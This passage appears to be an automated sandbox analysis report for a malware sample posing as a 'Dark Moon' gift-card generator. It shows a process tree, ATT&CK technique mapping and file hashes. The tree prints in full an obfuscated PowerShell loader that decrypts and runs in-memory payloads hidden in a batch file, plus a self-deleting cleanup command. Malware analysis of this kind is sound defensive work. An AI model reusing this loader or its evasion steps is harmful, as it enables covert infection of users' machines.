                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 460
                                                      6⤵
                                                      • Program crash
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      PID:5588
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{c5f489c7-a407-4533-969c-b2dd5cba468c}
                                                    5⤵
                                                      PID:3344
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                              1⤵
                                                PID:1104
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                1⤵
                                                  PID:1112
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                  1⤵
                                                    PID:1212
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                    1⤵
                                                      PID:1224
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      1⤵
                                                        PID:1316
                                                        • C:\Windows\system32\sihost.exe
                                                          sihost.exe
                                                          2⤵
                                                            PID:2412
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                          1⤵
                                                          • Drops file in System32 directory
                                                          PID:1324
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                          1⤵
                                                            PID:1396
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                            1⤵
                                                              PID:1508
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                              1⤵
                                                                PID:1516
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                1⤵
                                                                  PID:1524
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                  1⤵
                                                                    PID:1644
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    1⤵
                                                                      PID:1656
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1696
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1740
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1772
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                            1⤵
                                                                              PID:1904
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:1936
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1948
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1996
                                                                                  • C:\Windows\System32\spoolsv.exe
                                                                                    C:\Windows\System32\spoolsv.exe
                                                                                    1⤵
                                                                                      PID:1724
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                      1⤵
                                                                                        PID:2092
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                        1⤵
                                                                                          PID:2172
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                          1⤵
                                                                                          • Checks processor information in registry
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2400
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                          1⤵
                                                                                            PID:2436
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2492
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                              1⤵
                                                                                                PID:2500
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2612
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                1⤵
                                                                                                • Enumerates connected drives
                                                                                                PID:2692
                                                                                              • C:\Windows\sysmon.exe
                                                                                                C:\Windows\sysmon.exe
                                                                                                1⤵
                                                                                                  PID:2700
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                  1⤵
                                                                                                    PID:2720
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                    1⤵
                                                                                                      PID:2740
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                      1⤵
                                                                                                        PID:2796
                                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2904
                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                          C:\Windows\Explorer.EXE
                                                                                                          1⤵
                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                          PID:3360
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"
                                                                                                            2⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3204
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /K uni.bat
                                                                                                              3⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2812
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                4⤵
                                                                                                                  PID:2100
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                  "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:3924
                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{3b8f9b8f-fba0-4b2f-9e65-118eecd89145}
                                                                                                                    5⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4344
                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{1df7d0a7-c244-428b-a596-5c8ed35cfd0f}
                                                                                                                    5⤵
                                                                                                                      PID:4280
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit
                                                                                                                      5⤵
                                                                                                                        PID:3648
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:1600
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          PING localhost -n 8
                                                                                                                          6⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4720
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                          6⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:1284
                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                          ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                          6⤵
                                                                                                                          • Views/modifies file attributes
                                                                                                                          PID:2880
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exe
                                                                                                                    main.exe
                                                                                                                    3⤵
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3356
                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                      cmd /c "Dark Moon gen.bat"
                                                                                                                      4⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1384
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        5⤵
                                                                                                                          PID:2916
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp 65001
                                                                                                                          5⤵
                                                                                                                            PID:3344
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 2
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:2880
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2120
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2604
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2308
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4040
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2568
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:3376
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4084
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping localhost -n 1
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4976
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping discord.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:3124
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4856
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping www.paysafecard.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2348
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4568
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping www.amazon.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4808
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:3160
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping play.google.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:3956
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:3116
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping store.steampowered.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4636
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4492
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping netflix.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:3940
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5424
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping www.spotify.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:5908
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5740
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping www.xbox.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:5844
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 0
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5740
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 1
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:2524
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 2
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5836
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 2
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:5980
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping www.google.com
                                                                                                                            5⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:5896
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout 2
                                                                                                                            5⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4256
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                    1⤵
                                                                                                                      PID:3384
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                      1⤵
                                                                                                                        PID:3556
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:3764
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3916
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4148
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4316
                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4052
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:5092
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1268
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                      1⤵
                                                                                                                                        PID:2532
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                        1⤵
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:4604
                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:4328
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:4112
                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                          1⤵
                                                                                                                                            PID:4872
                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:1768
                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:1956
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                1⤵
                                                                                                                                                  PID:3592
                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 3592 -s 1312
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:4340
                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:4900
                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1272
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2152
                                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2988
                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:5164
                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 456 -p 3592 -ip 3592
                                                                                                                                                          2⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          PID:5344
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4200 -ip 4200
                                                                                                                                                          2⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          PID:4824
                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 668 -p 4576 -ip 4576
                                                                                                                                                          2⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          PID:5608
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4932 -ip 4932
                                                                                                                                                          2⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          PID:6076
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                        1⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:1200

                                                                                                                                                      Network

                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                      Persistence

                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                      1
                                                                                                                                                      T1547

                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                      1
                                                                                                                                                      T1547.001

                                                                                                                                                      Pre-OS Boot

                                                                                                                                                      1
                                                                                                                                                      T1542

                                                                                                                                                      Bootkit

                                                                                                                                                      1
                                                                                                                                                      T1542.003

                                                                                                                                                      Privilege Escalation

                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                      1
                                                                                                                                                      T1547

                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                      1
                                                                                                                                                      T1547.001

                                                                                                                                                      Defense Evasion

                                                                                                                                                      Modify Registry

                                                                                                                                                      1
                                                                                                                                                      T1112

                                                                                                                                                      Pre-OS Boot

                                                                                                                                                      1
                                                                                                                                                      T1542

                                                                                                                                                      Bootkit

                                                                                                                                                      1
                                                                                                                                                      T1542.003

                                                                                                                                                      Hide Artifacts

                                                                                                                                                      1
                                                                                                                                                      T1564

                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                      1
                                                                                                                                                      T1564.001

                                                                                                                                                      Discovery

                                                                                                                                                      Query Registry

                                                                                                                                                      6
                                                                                                                                                      T1012

                                                                                                                                                      System Information Discovery

                                                                                                                                                      6
                                                                                                                                                      T1082

                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                      1
                                                                                                                                                      T1120

                                                                                                                                                      Remote System Discovery

                                                                                                                                                      1
                                                                                                                                                      T1018

                                                                                                                                                      Command and Control

                                                                                                                                                      Web Service

                                                                                                                                                      1
                                                                                                                                                      T1102

                                                                                                                                                      Replay Monitor

                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                      Downloads

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B0C.tmp.csv
                                                                                                                                                        Filesize

                                                                                                                                                        41KB

                                                                                                                                                        MD5

                                                                                                                                                        6dadedb3de2e1069d3ba497da92275b4

                                                                                                                                                        SHA1

                                                                                                                                                        1a7f170b6702ff0e6668d27f50ff038c68c396e2

                                                                                                                                                        SHA256

                                                                                                                                                        47f2178a2850ec29797f45e621c221907d1567dca307161eec8a2ea8c9d34b77

                                                                                                                                                        SHA512

                                                                                                                                                        ec15ae06d80b09d121aa96e54fcbf0150dd86ca6e0f87beab05da44a25028663a3d308cd1ff3fdc9b801031f9506b577761091fa9defad65e99e5b8c0064e16e

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B2C.tmp.txt
                                                                                                                                                        Filesize

                                                                                                                                                        13KB

                                                                                                                                                        MD5

                                                                                                                                                        243472f21248e9813018c18c207ba9d6

                                                                                                                                                        SHA1

                                                                                                                                                        e472e473e252a22915af03e82e47aab3fe06a63b

                                                                                                                                                        SHA256

                                                                                                                                                        f535fee9f9e239ed5b3d9d9c17e25221ae8d1ada98c75af40dc9418a1d1a1368

                                                                                                                                                        SHA512

                                                                                                                                                        67f6993c7e9c3bdd1c8fa13eddb30dde8d558da4651236460f5a80cb3f361f6cd859ff6d0c1168c410dd13a02e15fab04cba0af7ed3d162f1a7a59badb21d486

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE774.tmp.csv
                                                                                                                                                        Filesize

                                                                                                                                                        41KB

                                                                                                                                                        MD5

                                                                                                                                                        fc14d8263aaf11fcce66a07ca73a1ebc

                                                                                                                                                        SHA1

                                                                                                                                                        5386494630809d8b5a3e8292d972130484e6ea31

                                                                                                                                                        SHA256

                                                                                                                                                        1dc54bf84f4163cdf4e365d034eb776a2cbff30a657f04fbc22650eb6cfe842c

                                                                                                                                                        SHA512

                                                                                                                                                        82af53cc0291030e9cbcce127465a5e1a453cf42139cb30121f35bd15c5101bad61fb73c953478e9949df0c8eca68ea46e536df7dbb75b951cb811ba81296778

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE794.tmp.txt
                                                                                                                                                        Filesize

                                                                                                                                                        13KB

                                                                                                                                                        MD5

                                                                                                                                                        3f95b8e4a1eb63d1c48a3975a1a023c1

                                                                                                                                                        SHA1

                                                                                                                                                        de3b9bacc6e86891fd2314654f975ff289912103

                                                                                                                                                        SHA256

                                                                                                                                                        8a3ba3bb6ee287c1aa77ae36e9c7f1e9af2cc854b83c9afecc5ee92d0c04402b

                                                                                                                                                        SHA512

                                                                                                                                                        12374424bfa5b05ac01aa64d0a76af1f27903cbf61fb79f7586d99ab5c2e8498ac405f2b8cebf7a7dbd19184708ddffa040d53c6a27b721f020027a23b3b674d

